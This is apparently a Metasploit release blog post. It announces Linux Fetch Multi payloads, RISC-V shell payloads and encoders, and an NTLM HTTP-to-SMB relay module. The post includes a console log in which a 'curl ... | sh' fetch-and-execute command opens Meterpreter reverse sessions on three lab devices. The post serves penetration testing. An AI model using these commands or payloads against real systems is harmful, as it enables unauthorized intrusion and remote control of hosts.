Metasploit Wrap Up Housekeeping
While the Metasploit Framework will be continuing its weekly release cadence, bringing you dear reader our latest content, the Weekly Wrap Up is being shifted to a bi-weekly cadence. The team is planning to use the additional time between posts to record demos of some of the more exciting content. Stay tuned for the next generation of Metasploit Wrap Ups and be sure to subscribe to the RSS Feed to be alerted when new blogs are released.
Fetch Multi: Just Fetch and Forget?
Our very own bwatters-r7 continued to enhance our Fetch Payloads implementation. This time adding a new Linux Fetch Multi payload family that supports on-the-fly Linux architecture identification. Standard Fetch payloads produce a command that will download and execute a specific binary payload on a target, but the new Linux Fetch Multi family will report the architecture of the target host when it requests the payload, and the handler will automatically serve the correct elf architecture payload for the given target. It means that if a user is exploiting a Linux host, they do not need to guess the target’s architecture when selecting a payload. It also means that one payload and one handler can serve across multiple targets of differing architectures. Since these payloads work by adding a query string, only HTTP and HTTPS-based fetch payloads support Fetch Multi payloads.
Here is an example of the same payload and handler identifying and delivering the proper elf architecture payloads to a mipsel host, a mips64 host, and an aarch64 host by just executing the command curl -s http://10.5.135.210:8080/x|sh on each target.
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) > show options
Module options (payload/cmd/linux/http/multi/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, GET, TFTP, TNFTP,
WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous
handles, requires Linux ≥3.17 (for Python variant also Python ≥3
.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+
, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH x no Local URI to use for serving payload
LHOST 10.5.135.210 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,GET,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE true yes Host both the binary payload and the command so it can be piped dire
ctly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME cldOGvRDplZ no Name to use on remote system when storing payload; cannot co
ntain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
View the full module info with the info, or info -d command.
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) > to_handler
[*] Command to execute on target: curl -s http://10.5.135.210:8080/x|sh
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 10.5.135.210:8080
[*] HTTP server started
[*] Adding resource /csmCra8lnQTHxFXkipQC0w
[*] Adding resource /x
[*] Started reverse TCP handler on 10.5.135.210:4444
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) > [*] Client 10.5.132.212 requested /x
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Client 10.5.132.212 requested /csmCra8lnQTHxFXkipQC0w?arch=armv7l
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for armle arch
[*] Meterpreter session 1 opened (10.5.135.210:4444 -> 10.5.132.212:45068) at 2026-07-14 11:33:18 -0500
[*] Client 10.5.132.214 requested /x
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Client 10.5.132.214 requested /csmCra8lnQTHxFXkipQC0w?arch=aarch64
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for aarch64 arch
[*] Meterpreter session 2 opened (10.5.135.210:4444 -> 10.5.132.214:39894) at 2026-07-14 11:33:26 -0500
[*] Client 10.5.132.224 requested /x
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Client 10.5.132.224 requested /csmCra8lnQTHxFXkipQC0w?arch=mips64
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for mips64 arch
[*] Meterpreter session 3 opened (10.5.135.210:4444 -> 10.5.132.224:53506) at 2026-07-14 11:33:41 -0500
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) > sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (10.5.132.212)
Computer : kali-raspberrypi
OS : Debian (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple : armv5l-linux-musleabi
Meterpreter : cmd/linux
[*] Running 'sysinfo' on meterpreter session 2 (10.5.132.214)
Computer : kali-raspberrypi
OS : Debian (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple : aarch64-linux-musl
Meterpreter : cmd/linux
[*] Running 'sysinfo' on meterpreter session 3 (10.5.132.224)
Computer : ubnt
OS : Debian 9.13 (Linux 4.9.79-UBNT)
Architecture : mips64
BuildTuple : mips64-linux-muslsf
Meterpreter : cmd/linux
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) >RISC architecture is going to change everything!
Speaking of juggling multiple architectures, bcoles added support for yet another IoT arch: RiscV. The change adds staged and stageless shell payloads for both 32- and 64-bit RiscV systems, and dovetails well with his other PR adding XOR encoders for RiscV payloads.
New module content (4)
Microsoft Windows HTTP to SMB Relay
Author: jheysel-r7
Type: Auxiliary
Pull request: #21620 contributed by jheysel-r7
Path: server/relay/http_to_smb
Description: Adds an HTTP to SMB Relay server module allowing users to relay an incoming NTLM HTTP authentication request to multiple SMB servers in order to establish SMB session on the target hosts to be used by the framework.
Byte XORi Encoder
Author: bcoles [email protected]
Type: Encoder
Pull request: #21235 contributed by bcoles
Path: riscv32le/byte_xori
Description: Add four encoder variants for both RISC-V 32-bit and 64-bit little-endian architectures.
FTP, HTTP, HTTPS and METERPRETER_REVERSE_TCP Fetch, Linux Chmod
Authors: Brendan Watters, Spencer McIntyre, and bcoles [email protected]
Type: Payload (Adapter)
Pull request: #21384 contributed by bwatters-r7
Description: Adds Linux fetch multi payloads, a fetch server for FTP-based fetch payloads, a TFTP server to rex/proto to align with our other servers.
This adapter adds 421 new payloads for all Linux and Windows architectures including:
- cmd/linux/ftp/aarch64/chmod
- cmd/linux/ftp/x86/meterpreter/reverse_tcp
- cmd/windows/ftp/aarch64/meterpreter_reverse_http
FTP Fetch, Linux dup2 Command Shell, Bind TCP Stager
Authors: Brendan Watters, Spencer McIntyre, and bcoles [email protected]
Type: Payload (Stager)
Pull request: #21237 contributed by bcoles
Description: Adds reverse_tcp and bind_tcp stagers and a shell command stage for both RISC-V 64-bit and 32-bit little-endian Linux targets.
- cmd/linux/ftp/riscv32le/shell/bind_tcp
- cmd/linux/http/riscv32le/shell/bind_tcp
- cmd/linux/https/riscv32le/shell/bind_tcp
- cmd/linux/tftp/riscv32le/shell/bind_tcp
- linux/riscv32le/shell/bind_tcp
- cmd/linux/ftp/riscv32le/shell/reverse_tcp
- cmd/linux/http/riscv32le/shell/reverse_tcp
- cmd/linux/https/riscv32le/shell/reverse_tcp
- cmd/linux/tftp/riscv32le/shell/reverse_tcp
- linux/riscv32le/shell/reverse_tcp
- cmd/linux/ftp/riscv64le/shell/bind_tcp
- cmd/linux/http/riscv64le/shell/bind_tcp
- cmd/linux/https/riscv64le/shell/bind_tcp
- cmd/linux/tftp/riscv64le/shell/bind_tcp
- linux/riscv64le/shell/bind_tcp
- cmd/linux/ftp/riscv64le/shell/reverse_tcp
- cmd/linux/http/riscv64le/shell/reverse_tcp
- cmd/linux/https/riscv64le/shell/reverse_tcp
- cmd/linux/tftp/riscv64le/shell/reverse_tcp
- linux/riscv64le/shell/reverse_tcp
Enhancements and features (4)
- #21235 from bcoles - Add four encoder variants for both RISC-V 32-bit and 64-bit little-endian architectures.
- #21384 from bwatters-r7 - Adds Linux fetch multi payloads, a fetch server for FTP-based fetch payloads, a TFTP server to rex/proto to align with our other servers.
- #21599 from Pushpenderrathore - This extends CertificateTrace functionality to also surface the server's TLS peer certificate when an HTTP module connects over HTTPS. This makes use of the same CertificateTrace enum (off/metadata/full) operators are already familiar with.
- #21602 from zeroSteiner - Updates the Windows service PE template to use an injected segment instead of the old substitution method.
Bugs fixed (4)
- #21621 from eipoverflow - This fix a limitation on running fileless staged Meterpreter in recent OSX versions.
- #21670 from zeroSteiner - Marks the dynamic XOR encoders as unable to preserve registers and adds regression coverage for stage encoding when a preserved register is required.
- #21675 from sjanusz-r7 - Fix search_cache job cache generation by skipping multi arch payloads.
- #21677 from bwatters-r7 - Fixes a bug in the HTTP relay server mixin where requests matching the module's URIPATH were silently dropped instead of being relayed The fix removes the now-unnecessary URIPATH option, ensures all requests are properly relayed, and adds spec tests to cover the fix.
Documentation
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro



